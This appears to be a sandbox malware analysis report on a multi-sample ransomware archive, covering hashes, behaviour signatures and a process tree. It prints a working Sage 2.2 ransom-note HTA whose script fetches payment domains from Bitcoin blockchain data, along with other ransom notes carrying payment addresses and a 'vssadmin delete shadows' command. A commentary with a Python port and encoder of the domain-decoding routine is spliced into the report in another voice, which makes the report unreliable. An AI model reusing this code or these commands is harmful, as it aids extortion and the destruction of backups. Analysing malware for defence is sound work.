Analysis

  • max time kernel
    127s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64 arch:x86 image:win7-20241023-en locale:en-us os:windows7-x64 system
  • submitted
    12-11-2024 17:59

General

  • Target

    RNSM00325.7z

  • Size

    1.6MB

  • MD5

    578a90c19beddfcd819e9a6aaec2018c

  • SHA1

    9b76ef908d81691a0af9361ae4401d7fa3b9c21a

  • SHA256

    7726f4c7c58243759dd8f3a68617657a623b28ba648c0a53a1a8ce7fe33c99cb

  • SHA512

    b469676d0b4cc5e4b9e7ea04cf43619c1bcbd25a9a98f1313e69efb36b6784d5549f40b3c5607e1ca6c4326c1c1a9776859896d7a6df7f00b10e15c314983832

  • SSDEEP

    49152:RBjx79qjSJVqk/xjopabNBFqkr1JCXegfvfL:TN7hJVqk/+4bLFCuGT

Malware Config

Extracted

Path

C:\Users\Admin\Documents\READ_THIS_TO_DECRYPT.html

Ransom Note
<html> <head> <title>-</title> <style> html {font-family:Consolas;font-size:20px;background-color:lightgrey;} div{ margin:0 auto 15px auto; border:1px solid; background-color:grey;} p,h3{ text-align:center; color:white; } #R{background-color:darkred;} button{padding:10px 15px; margin:15px;} </style> </head> <body> <div> <h3>YOU PERSONAL FILES HAS BEEN ENCRYPTED</h3> <p>-</p> <p>Your data (photos, documents, databases etc.) have been encrypted with a private and unique key generated for this computer. This means that you will not be able to access your files anymore until they are decrypted. The privete key is stored in our servers and the only way to receive your key to decrypt your files is making a payment.</p> </div> <div> <p>The payment has to be done in Bitcoin to a unique address that we generated for you. Bitcoins are the virtual currency to make online payments. If you don't know how to get Bitcoins, you can click the button "How to buy Bitcoins" below and follow the instructions. If you have problem with this task use internet.</p> <p><abbr style="color:red;background-color:black;">You have only 1 week to submit the payment.</abbr> When this time ends, the unique key will be destroyed and you won't be able to recover your files anymore.</p> </div> <div id="R"><h3>YOUR UNIQUE KEY WILL BE DESTROYED IN 1 WEEK FROM ENCRYPTION!</h3></div> <div> <p>To recover your files, you must send 0.1 Bitcoins ( ~$37 ) to the next Bitcoin address:</p> <p><abbr style="background-color:white;font-size:35px;color:black;">15F5FM7qMhLQ44RDxuozbKRwSbHKmq7N39</abbr></p> <a target="_blank" href="https://bitcoin.org/en/getting-started"><button>How to buy Bitcoins #1</button></a> <a target="_blank" href="https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version)"><button>How to buy Bitcoins #2</button></a> </div> </body> </html>

Extracted

Path

C:\Users\Admin\Desktop\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function 
aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" 
: "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < 
json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); // tweakClass('links', function(el){ el.innerHTML = err; }); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A" onclick="javascript:return 
openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,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" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2> <h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann 
wiederhergestellt werden</h2> <h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2> <h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2> <h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2> <h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2> <h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2> <h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2> <h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2> <h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2> <h2>Action required to restore your files.</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. 
Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnkrjykggd.2kzm0f.com/login/AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.2kzm0f.com/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.6t4u2p.net/login/AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.6t4u2p.net/</a> </div> </div> <div class='info lu lu-orig'> <p>If none of these links work for you, <a href='#' onclick='javascript:return updateLinks()'><b>click here</b></a> to update the list.</p> </div> <div class='info lu lu-updating'> <p>Updating links...</p> </div> <div class='info lu lu-error'> <p>Something went wrong while updating links, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <div class='info lu lu-done'> <p>Links updated, if new ones still don't work, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <p>If you are asked for your personal key, copy it to the form on the site. 
This is your personal key:</p> <div class='keys'> <div class='key'> AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A </div> </div> <p>You will also be able to decrypt one file for free to make sure "SAGE Decrypter" software is able to recover your files</p> <div class='info'> <p>If none of those links work for you for a prolonged period of time or you need your files recovered as fast as possible, you can also access your personal page using "Tor Browser".</p> <p>In order to do that you need to:</p> <ol> <li>open Internet Explorer or any other internet browser;</li> <li>copy the address <a href='https://www.torproject.org/download/download-easy.html.en' onclick='javascript:return openlink(this.href)'>https://www.torproject.org/download/download-easy.html.en</a> into address bar and press "Enter";</li> <li>once the page opens, you will be offered to download Tor Browser, download it and run the installator, follow installation instructions;</li> <li>once instal
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx
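The two "URLs" above are not real addresses: the report's URL extractor matched the string-concatenation fragments (`'http://'+s.bp`) inside the !HELP_SOS.hta script. What that script actually does is query several public Bitcoin block explorers for transactions sent from a hard-coded address, pull the first `OP_RETURN` output, and decode it with a chained XOR (seed 0xAA) into a colon-separated list of replacement payment-site domains. The block below is an added example, not code from the report or from the Sage 2.2 authors: a Python port of that `decodeTxString` routine, the matching encoder (an assumption, since the page only ships the decoder), and the HTA's output-selection rule, run against a constructed `OP_RETURN` output rather than a live transaction.

```python
# Added example, not part of the sandbox report or the Sage 2.2 code.
# Port of decodeTxString from the extracted !HELP_SOS.hta, plus the inverse
# (the encoder is an assumption: only the decoder appears on the page).
# SAMPLE_OUTPUTS is constructed for this example; it is not a real transaction
# from the 1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7 address named in the HTA.
from typing import List

SEED = 0xAA                      # initial chaining byte hard-coded in the HTA
OP_RETURN_PREFIX = "OP_RETURN "  # the HTA strips exactly these 10 characters


def decode_tx_string(hex_payload: str) -> str:
    """Mirror of the HTA's decodeTxString: each plaintext byte is the XOR of the
    previous plaintext byte (0xAA for the first) with the ciphertext byte."""
    data = bytes.fromhex(hex_payload)   # ValueError on a bad nibble, like the JS throw
    out = []
    prev = SEED
    for b in data:
        prev ^= b
        out.append(prev)
    return bytes(out).decode("latin-1")


def encode_tx_string(plaintext: str) -> str:
    """Inverse of decode_tx_string (assumed encoder, not taken from the page)."""
    prev = SEED
    out = []
    for ch in plaintext.encode("latin-1"):
        out.append(prev ^ ch)
        prev = ch
    return bytes(out).hex()


def domains_from_asm(asm: str) -> List[str]:
    """The HTA's per-output rule: only scripts starting with 'OP_RETURN ' count,
    the payload after the prefix is decoded, and the result is split on ':'."""
    if not asm.startswith(OP_RETURN_PREFIX):
        return []
    return decode_tx_string(asm[len(OP_RETURN_PREFIX):]).split(":")


def extract_domains(outputs: List[str]) -> List[str]:
    """First OP_RETURN output wins, matching the HTA's return-on-first-match loop."""
    for asm in outputs:
        found = domains_from_asm(asm)
        if found:
            return found
    return []


# Constructed sample: a normal P2PKH output followed by an OP_RETURN output that
# carries the two domains printed in the ransom note, encoded as above.
SAMPLE_OUTPUTS = [
    "OP_DUP OP_HASH160 0000000000000000000000000000000000000000 OP_EQUALVERIFY OP_CHECKSIG",
    OP_RETURN_PREFIX + encode_tx_string("2kzm0f.com:6t4u2p.net"),
]

if __name__ == "__main__":
    print(extract_domains(SAMPLE_OUTPUTS))   # ['2kzm0f.com', '6t4u2p.net']
```

The chaining means a single corrupted byte garbles only the characters up to the next one, so a defender who has the seed can decode any OP_RETURN payload pulled from the explorers the HTA names; the hard-coded sender address and the 0xAA seed are the stable indicators here, not the domains themselves.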

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

Ransom Note
All your files have been encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] Write this ID in the title of your message 2FA84094 In case of no answer in 24 hours write us to theese e-mails: [email protected] You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Free decryption as guarantee Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Signatures

  • Dharma

    Dharma (also tracked as Crysis) is a ransomware family that has been distributed bundled with legitimate security-software installers so that the installer's activity masks the encryption.

  • Dharma family
  • GandCrab payload 1 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • Contacts a large number (7702) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large number of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (310) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 9 IoCs
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 14 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1208
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00325.7z"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2588
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
          HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of SetWindowsHookEx
          PID:1280
          • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
            C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1328
            • C:\Users\Admin\AppData\Roaming\YI89EL.exe
              "C:\Users\Admin\AppData\Roaming\YI89EL.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              PID:3980
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k
                6⤵
                • Maps connected drives based on registry
                PID:4072
        • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b.exe
          HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          PID:1792
        • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
          HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
          3⤵
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
            HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
            4⤵
            • Executes dropped EXE
            PID:3016
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.meia-b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6.exe
          Trojan-Ransom.Win32.Blocker.meia-b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: MapViewOfSection
          PID:1480
          • C:\Windows\SysWOW64\explorer.exe
            "C:\Windows\system32\explorer.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2912
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
          Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3024
          • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
            Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:3952
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crusis.to-153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d.exe
          Trojan-Ransom.Win32.Crusis.to-153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d.exe
          3⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: RenamesItself
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2424
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              5⤵
              PID:1528
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              5⤵
              • Interacts with shadow copies
              PID:696
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            4⤵
            PID:4672
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              5⤵
              PID:2788
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              5⤵
              • Interacts with shadow copies
              PID:4056
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
            4⤵
            • Modifies Internet Explorer settings
            PID:4708
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
            4⤵
            • Modifies Internet Explorer settings
            PID:756
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crypren.acmd-082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76.exe
          Trojan-Ransom.Win32.Crypren.acmd-082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76.exe
          3⤵
          • Drops startup file
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2580
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Foreign.nyqu-bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c.exe
          Trojan-Ransom.Win32.Foreign.nyqu-bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c.exe
          3⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
